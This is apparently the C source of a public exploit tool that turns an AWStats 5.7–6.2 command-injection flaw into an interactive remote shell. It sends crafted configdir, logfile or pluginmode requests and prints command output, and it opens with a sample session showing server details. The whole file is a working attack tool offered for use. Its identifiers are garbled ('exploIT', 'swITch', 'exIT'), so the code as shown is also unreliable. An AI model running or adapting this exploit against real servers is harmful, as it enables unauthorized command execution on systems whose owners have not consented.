/*
* Awstats exploIT "shell"
* code by omin0us
* omin0us208 [at] gmail [dot] com
* dtors securITy group
* . [url]http://dtors.ath.cx[/url] ):.
*
* VulnerabilITy reported by iDEFENSE
*
* The awstats exploIT that was discovered allows
* a user to execute arbITrary commands on the
* remote server wITh the privileges of the httpd
*
* This exploit combines all three methods of exploITation
* and acts as a remote "shell", parsing all returned
* data to display command output and running in a loop
* for continuous access.
*
* bash-2.05b$ awstats_shell localhost
* Awstats 5.7 - 6.2 exploIT Shell 0.1
* code by omin0us
* dtors securITy group
* .: [url]http://dtors.ath.cx[/url] :.
* --------------------------------------
* select exploIT method:
* 1. ?configdir=|cmd}
* 2. ?update=1&logfile=|cmd|
* 3. ?pluginmode=:system("cmd");
*
* method [1/2/3]? 1
* starting shell...
* (ctrl+c to exIT)
* sh3ll> id
* uid=80(www) gid=80(www) groups=80(www)
* DTORS_STOP
* sh3ll> uname -a
*
* FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon
Oct 11
* 19:34:01 EDT 2004 omin0us@localhost:/usr/src/sys/compile/DTORS
i386
* DTORS_STOP
* sh3ll>
*
* this is licensed under the GPL
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80
#define CMD_BUFFER 512
#define IN_BUFFER 10000
#define MAGIC_START "DTORS_START"
#define MAGIC_STOP "DTORS_STOP"

void usage(char *argv[]);

int main(int argc, char *argv[]){

FILE *output;
int sockfd;
struct sockaddr_in addr;
struct hostent *host;
char *host_name=NULL, *awstats_dir=NULL;
char cmd[CMD_BUFFER], cmd_url[CMD_BUFFER*3], incoming[IN_BUFFER], tmp,
c, cli_opt;
int i, j, flag, method, verbose=0;

if(argc < 2){
usage(argv);
}

printf("Awstats 5.7 - 6.2 exploIT Shell 0.1\n");
printf("code by omin0us\n");
printf("dtors securITy group\n");
printf(".: [url]http://dtors.ath.cx[/url] :.\n");
printf("--------------------------------------\n");

while(1){
cli_opt = getopt(argc, argv, "h:d:v");

if(cli_opt < 0)
break;

swITch(cli_opt){
case 'v':
verbose = 1;
break;
case 'd':
awstats_dir = optarg;
break;
}
}

if((optind >= argc) || (strcmp(argv[optind], "-") == 0)){
printf("Please specify a Host\n");
usage(argv);
}

if(!awstats_dir){
awstats_dir = "/cgi-bin/awstats.pl";
}

printf("select exploIT method:\n"
"\t1. ?configdir=|cmd}\n"
"\t2. ?update=1&logfile=|cmd|\n"
"\t3. ?pluginmode=:system(\"cmd\");\n");
while(method != '1' && method != '2' && method != '3'){
printf("\nmethod [1/2/3]? ");
method = getchar();
}

printf("starting shell...\n(ctrl+c to exIT)\n");

while(1){
i=0;
j=0;
memset(cmd, 0, CMD_BUFFER);
memset(cmd_url, 0, CMD_BUFFER*3);
memset(incoming, 0, IN_BUFFER);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
printf("Error creating socket\n");
exIT(1);
}

if((host = gethostbyname(argv[optind])) == NULL){
printf("Could not resolv host\n");
exIT(1);
}

addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr = *((struct in_addr *)host->h_addr);

printf("sh3ll> ");
fgets(cmd, CMD_BUFFER-1, stdin);

if(verbose)
printf("Connecting to %s (%s)...\n", host->h_name,
inet_ntoa(*((struct in_addr *)host->h_addr)));

if( connect(sockfd, (struct sockaddr *)&addr, sizeof(struct
sockaddr_in)) != 0){
printf("Count not connect to host\n");
exIT(1);
}

output = fdopen(sockfd, "a");
setbuf(output, NULL);

cmd[strlen(cmd)-1] = '\0';
if(strlen(cmd) == 0){
cmd[0]='i';
cmd[1]='d';
cmd[3]='\0';
}

for(i=0; i<strlen(cmd); i++){
c = cmd[i];
if(c == ' '){
cmd_url[j++] = '%';
cmd_url[j++] = '2';
cmd_url[j++] = '0';
}
else{
cmd_url[j++] = c;
}
}
cmd_url[j] = '\0';

if(method == '1'){
if(verbose){
printf("Sending Request\n");
printf("GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo|
HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
}

fprintf(output, "GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo|
HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
}

if(method == '2'){
if(verbose){
printf("Sending Request\n");
printf("GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo|
HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
}
fprintf(output, "GET
%s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n",
awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
}

if(method == '3'){
if(verbose){
printf("Sending Request\n");
printf("GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\");
HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Host: %s\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP,
argv[optind]);
}
fprintf(output, "GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\");
HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Host: %s\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
}

i=0;
while(strstr(incoming, MAGIC_START) == NULL){
flag = read(sockfd, &tmp, 1);
incoming[i++] = tmp;

if(i >= IN_BUFFER){
printf("flag [-] incoming buffer full\n");
exIT(1);
}
if(flag==0){
printf("exploITation of host failed\n");
exIT(1);
}
}

while(strstr(incoming, MAGIC_STOP) == NULL){
read(sockfd,&tmp,1);
incoming[i++] = tmp;
putchar(tmp);
if(i >= IN_BUFFER){
printf("putchar [-] incoming buffer full\n");
exIT(1);
}
}
printf("\n");

shutdown(sockfd, SHUT_WR);
close(sockfd);
fclose(output);
}
return(0);
}

void usage(char *argv[]){
printf("Usage: %s [options] <host>\n" , argv[0]);
printf("Options:\n");
printf(" -d <awstats_dir> directory of awstats script\n");
printf(" '/cgi-bin/awstats.pl' is default\n");
printf(" if no directory is specified\n\n");
printf(" -v verbose mode (optional)\n\n");
printf("example: %s -d /stats/awstats.pl websITe.com\n\n",
argv[0]);
exIT(1);
}